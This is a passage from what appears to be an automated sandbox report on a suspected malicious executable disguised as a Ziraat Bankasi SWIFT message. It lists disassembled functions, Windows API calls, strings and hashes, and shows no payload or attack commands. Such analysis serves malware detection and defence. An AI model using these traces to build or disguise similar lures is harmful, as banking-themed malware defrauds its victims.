_wcscmp.LIBCMT ref: 000BD045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000BD09A
_wcscmp.LIBCMT ref: 000BD0D6
GetClassNameW.USER32(?,?,00000400), ref: 000BD10D
GetDlgCtrlID.USER32(?), ref: 000BD15F
GetWindowRect.USER32(?,?), ref: 000BD195
GetParent.USER32(?), ref: 000BD1B3
ScreenToClient.USER32(00000000), ref: 000BD1BA
GetClassNameW.USER32(?,?,00000100), ref: 000BD234
_wcscmp.LIBCMT ref: 000BD248
GetWindowTextW.USER32(?,?,00000400), ref: 000BD26E
_wcscmp.LIBCMT ref: 000BD282

Strings

%s%u, xrefs: 000BD02C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 808deaa4ec60ad87dcadb2b55cdf0a0893bd2e3360572fba44eb464f18d28fb8
Instruction ID: c0cf12647c03b5dd7332ec76d6171d7b651e7b30d1286b51cb48a8a9271d08b7
Opcode Fuzzy Hash: 808deaa4ec60ad87dcadb2b55cdf0a0893bd2e3360572fba44eb464f18d28fb8
Instruction Fuzzy Hash: 7FA1CD71604746ABD714DF64C884FEAF7E8FF54314F008A2AF999D2181EB30EA45CBA1

Function 000BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 000BD8EB
_wcscmp.LIBCMT ref: 000BD8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 000BD924
CharUpperBuffW.USER32(?,00000000), ref: 000BD941
_wcscmp.LIBCMT ref: 000BD95F
_wcsstr.LIBCMT ref: 000BD970
GetClassNameW.USER32(00000018,?,00000400), ref: 000BD9A8
_wcscmp.LIBCMT ref: 000BD9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 000BD9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 000BDA28
_wcscmp.LIBCMT ref: 000BDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 000BDA60
GetWindowRect.USER32(00000004,?), ref: 000BDAC9

Strings

@, xrefs: 000BD8C6
ThumbnailClass, xrefs: 000BD9B3, 000BDA33

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 5ddc40ba6cb4d869896a63a552e12cdb229924d415c2de7f4917e091d709cb4b
Instruction ID: 182673bacfc1d0029242ea56afc5432efafd480b6ccf5c38444ef5410cda911a
Opcode Fuzzy Hash: 5ddc40ba6cb4d869896a63a552e12cdb229924d415c2de7f4917e091d709cb4b
Instruction Fuzzy Hash: 77819D310083059BDB15DF60D885FEABBE8FF84714F08846AFD899A096EB74DD45CBA1

Function 000BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000BD753

Strings

[CLASS:, xrefs: 000BD7A3
REGEXP=, xrefs: 000BD768
[HANDLE:, xrefs: 000BD75F
CLASSNAME=, xrefs: 000BD790
[ALL, xrefs: 000BD7F9
ACTIVE, xrefs: 000BD72E
LAST, xrefs: 000BD718
[LAST, xrefs: 000BD800
[REGEXPTITLE:, xrefs: 000BD77B
[ACTIVE, xrefs: 000BD740
ALL, xrefs: 000BD7E7
HANDLE=, xrefs: 000BD74C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 65a9cc88dcecd8b51e62f3526b17e2ae6b23b47344fff615612e3ae5ca1d20f2
Instruction ID: 03eab3d8ad4acae4fbebc30d919cb08206ea797a43bb4ffc6510e9f6d5029220
Opcode Fuzzy Hash: 65a9cc88dcecd8b51e62f3526b17e2ae6b23b47344fff615612e3ae5ca1d20f2
Instruction Fuzzy Hash: A6314F31648209AADB24FB60DE53EEDF3B5AF21755F20016AF481B10D6FF62AE04C755

Function 000BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 000BEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000BEAC2
SetWindowTextW.USER32(?,?), ref: 000BEAD9
GetDlgItem.USER32(?,000003EA), ref: 000BEAEE
SetWindowTextW.USER32(00000000,?), ref: 000BEAF4
GetDlgItem.USER32(?,000003E9), ref: 000BEB04
SetWindowTextW.USER32(00000000,?), ref: 000BEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000BEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000BEB45
GetWindowRect.USER32(?,?), ref: 000BEB4E
SetWindowTextW.USER32(?,?), ref: 000BEBB9
GetDesktopWindow.USER32 ref: 000BEBBF
GetWindowRect.USER32(00000000), ref: 000BEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000BEC12
GetClientRect.USER32(?,?), ref: 000BEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000BEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000BEC6F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 9b7b815c01b6895f4fcc525fb85f4c75f591b9241e30fb806664866f9a1508b1
Instruction ID: c2fcff086323866fa5afd9a25aad0e017e13571e6734f0322e1818fc6be0a89a
Opcode Fuzzy Hash: 9b7b815c01b6895f4fcc525fb85f4c75f591b9241e30fb806664866f9a1508b1
Instruction Fuzzy Hash: 47513E71900749EFDB209FA8DD89FAFBBF5FF04704F004928E696A25A1D775A944CB10

Function 000D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 000D79C6
LoadCursorW.USER32(00000000,00007F00), ref: 000D79D1
LoadCursorW.USER32(00000000,00007F03), ref: 000D79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 000D79E7
LoadCursorW.USER32(00000000,00007F01), ref: 000D79F2
LoadCursorW.USER32(00000000,00007F81), ref: 000D79FD
LoadCursorW.USER32(00000000,00007F88), ref: 000D7A08
LoadCursorW.USER32(00000000,00007F80), ref: 000D7A13
LoadCursorW.USER32(00000000,00007F86), ref: 000D7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 000D7A29
LoadCursorW.USER32(00000000,00007F85), ref: 000D7A34
LoadCursorW.USER32(00000000,00007F82), ref: 000D7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 000D7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 000D7A55
LoadCursorW.USER32(00000000,00007F02), ref: 000D7A60
LoadCursorW.USER32(00000000,00007F89), ref: 000D7A6B
GetCursorInfo.USER32(?), ref: 000D7A7B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 8d195e4a3a77a89e419754b93095c4490d3c4104876709e8ee1d9b312ab10e83
Instruction ID: 6156c507456e2cb2eb53f25aefa9520e29eb99a08e742ebf2a2c1c7a1fb29fca
Opcode Fuzzy Hash: 8d195e4a3a77a89e419754b93095c4490d3c4104876709e8ee1d9b312ab10e83
Instruction Fuzzy Hash: 143129B0D083196ADF509FBA8C8995FBFE8FF44750F504527E50DE7280EA78A5008FA1

Function 0008C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0009E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0008C8B7,?,00002000), ref: 0009E984

Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F

__wsplitpath.LIBCMT ref: 0008C93E
_wcscpy.LIBCMT ref: 0008C953
_wcscat.LIBCMT ref: 0008C968
SetCurrentDirectoryW.KERNEL32(?), ref: 0008C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0008CABE

Part of subcall function 0008B337: _wcscpy.LIBCMT ref: 0008B36F

Strings

Unterminated string, xrefs: 000F3470
AU3!, xrefs: 0008C90C
Error opening the file, xrefs: 000F30B4, 000F313D
EA06, xrefs: 000F30C9
Bad directive syntax error, xrefs: 000F3429
#include depth exceeded. Make sure there are no recursive includes, xrefs: 000F3098
>>>AUTOIT SCRIPT<<<, xrefs: 000F311B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 1757494288-1018226102
Opcode ID: 53bebda98c7d41deb2e32921a7b444e0f5ea0303299847b0f07576c4007ea7a1
Instruction ID: f4faa4b3edfbc5509379f41dce6d452fa3a72f7694b891a74a6aba095fd54877
Opcode Fuzzy Hash: 53bebda98c7d41deb2e32921a7b444e0f5ea0303299847b0f07576c4007ea7a1
Instruction Fuzzy Hash: 231279715083459FD724EF24C881AAFBBE4BF99314F04492EF5C993262DB30DA49DB62

Function 000ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000ECEFB
DestroyWindow.USER32(?,?), ref: 000ECF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000ECFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000ED016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ED025
DestroyWindow.USER32(?), ref: 000ED042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00080000,00000000), ref: 000ED075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ED094
GetDesktopWindow.USER32 ref: 000ED0A9
GetWindowRect.USER32(00000000), ref: 000ED0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000ED0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000ED0DA

Part of subcall function 0009B526: GetWindowLongW.USER32(?,000000EB), ref: 0009B537

Strings

tooltips_class32, xrefs: 000ECFED, 000ED06E
0, xrefs: 000ECF1B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 10dbdbea092169b14c3064ad4ae13f1d8c0170e964250344670b4fddbf315b81
Instruction ID: 4bde660d81da9ec8a9cde8714967fafc6cb97b47ec44450fd5ca14aae00047e5
Opcode Fuzzy Hash: 10dbdbea092169b14c3064ad4ae13f1d8c0170e964250344670b4fddbf315b81
Instruction Fuzzy Hash: 7071CFB4140345AFDB24CF28CC85FAA77E5FB89704F08491EF985972A1D771E982CB12

Function 000EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DragQueryPoint.SHELL32(?,?), ref: 000EF37A

Part of subcall function 000ED7DE: ClientToScreen.USER32(?,?), ref: 000ED807
Part of subcall function 000ED7DE: GetWindowRect.USER32(?,?), ref: 000ED87D
Part of subcall function 000ED7DE: PtInRect.USER32(?,?,000EED5A), ref: 000ED88D

SendMessageW.USER32(?,000000B0,?,?), ref: 000EF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000EF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000EF411
_wcscat.LIBCMT ref: 000EF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 000EF458
SendMessageW.USER32(?,000000B0,?,?), ref: 000EF471
SendMessageW.USER32(?,000000B1,?,?), ref: 000EF488
SendMessageW.USER32(?,000000B1,?,?), ref: 000EF4AA
DragFinish.SHELL32(?), ref: 000EF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000EF59C

Strings

@GUI_DRAGFILE, xrefs: 000EF54B
@GUI_DRAGID, xrefs: 000EF510
@GUI_DROPID, xrefs: 000EF4D1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 26f15760a7e214def651099172d58c841f3d59ff828e83095a21e2ecaa509b29
Instruction ID: 53e45ec113d9b032da6871bd55604daeae1968d6ce8112b020190a808bd47e2e
Opcode Fuzzy Hash: 26f15760a7e214def651099172d58c841f3d59ff828e83095a21e2ecaa509b29
Instruction Fuzzy Hash: 51613A71108341AFC711EF64DC85DAFBBF8BF89714F004A1EF595A21A2DB709A49CB52

Function 000EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000EE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000EBEAF), ref: 000EE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,000EBEAF), ref: 000EE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EE6DF
DestroyIcon.USER32(?,?,?,?,?,000EBEAF), ref: 000EE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000EE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000EE717

Part of subcall function 000A0FA7: __wcsicmp_l.LIBCMT ref: 000A1030

Strings

.dll, xrefs: 000EE564
.icl, xrefs: 000EE521
.exe, xrefs: 000EE541

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: c4663aa464d596d603b49a21f7259fe986e2c9237ff6435a785bfd17004d8feb
Instruction ID: b98794fc6de97ad32ac93e8fc79a27427bfff82b3d8372cb31cc592e4466a7ff
Opcode Fuzzy Hash: c4663aa464d596d603b49a21f7259fe986e2c9237ff6435a785bfd17004d8feb
Instruction Fuzzy Hash: F3610171500699FEEB20DFA5DC46FFE77A8BB18764F104115F951E60D1EBB0AA80CBA0

Function 000D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000D09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 000D09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D09FB
__wsplitpath.LIBCMT ref: 000D0A59
_wcscat.LIBCMT ref: 000D0A71
_wcscat.LIBCMT ref: 000D0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000D0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0AFF
_wcscpy.LIBCMT ref: 000D0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000D0B4A

Strings

*.*, xrefs: 000D0B05

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 3d2d46cbefdbd44b041c10c7f21588524b9d3656d414a920fb450289288cb0ae
Instruction ID: 3c673becf6fb8e730ee8063712609674b40b0c00742ce6e8c7690b073af8b41b
Opcode Fuzzy Hash: 3d2d46cbefdbd44b041c10c7f21588524b9d3656d414a920fb450289288cb0ae
Instruction Fuzzy Hash: 19614C725043059FD710EF60C845AAEB3E8FF89314F04891EF999C7252DB31E945CBA2

Function 000CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CharLowerBuffW.USER32(?,?), ref: 000CD292
GetDriveTypeW.KERNEL32 ref: 000CD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD38C

Strings

open, xrefs: 000CD2B9
type cdaudio alias cd wait, xrefs: 000CD30A
set cd door , xrefs: 000CD32D
closed, xrefs: 000CD2A6, 000CD2AF
open , xrefs: 000CD2EE
close, xrefs: 000CD298
wait, xrefs: 000CD349
close cd wait, xrefs: 000CD377

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 0afecd95c4fb4b2cd4cb3d10e3bbfc0893ad714d7b5fbe2b2d95c47dd97d5485
Instruction ID: 9445cd77918b8681059422cffbe6491d663e693edbf78f77fb8e1782cd279bbf
Opcode Fuzzy Hash: 0afecd95c4fb4b2cd4cb3d10e3bbfc0893ad714d7b5fbe2b2d95c47dd97d5485
Instruction Fuzzy Hash: 0B512971104645AFC700EF20C9819AEB7E4FF98758F04486DF8D6A7292DB31EE06DB52

Function 000C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,?,?,000F3973,?,0000138C,?,?,?,?,00084D71,?), ref: 000C26F1
LoadStringW.USER32(00000000,?,000F3973,?), ref: 000C26FA
GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,000F3973,?,0000138C,?,?,?,?,00084D71,?,?), ref: 000C271C
LoadStringW.USER32(00000000,?,000F3973,?), ref: 000C271F
__swprintf.LIBCMT ref: 000C276F
__swprintf.LIBCMT ref: 000C2780
_wprintf.LIBCMT ref: 000C2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C2840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000C2824
Error: , xrefs: 000C27F7
^ ERROR, xrefs: 000C27D5
Line %d (File "%s"):, xrefs: 000C2769
Line %d:, xrefs: 000C277A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: e6acc8e01ead2ebc5f4e8d75d691dbecd2edadc747cab1c70a9d5d8b73388a3c
Instruction ID: 7526dec6ecf20905fce9f1375ca418da4072a248e3f5ca84e343f733006b698f
Opcode Fuzzy Hash: e6acc8e01ead2ebc5f4e8d75d691dbecd2edadc747cab1c70a9d5d8b73388a3c
Instruction Fuzzy Hash: 40412772800219AADF14FBE0DE86EEEB778BF15745F100069B541B6093EB746F49CB60

Function 000EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000EBEF4,?,?), ref: 000EE754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE776
CloseHandle.KERNEL32(00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE783
GlobalLock.KERNEL32(00000000), ref: 000EE78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE79B
GlobalUnlock.KERNEL32(00000000), ref: 000EE7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0010D9BC,?), ref: 000EE7D5
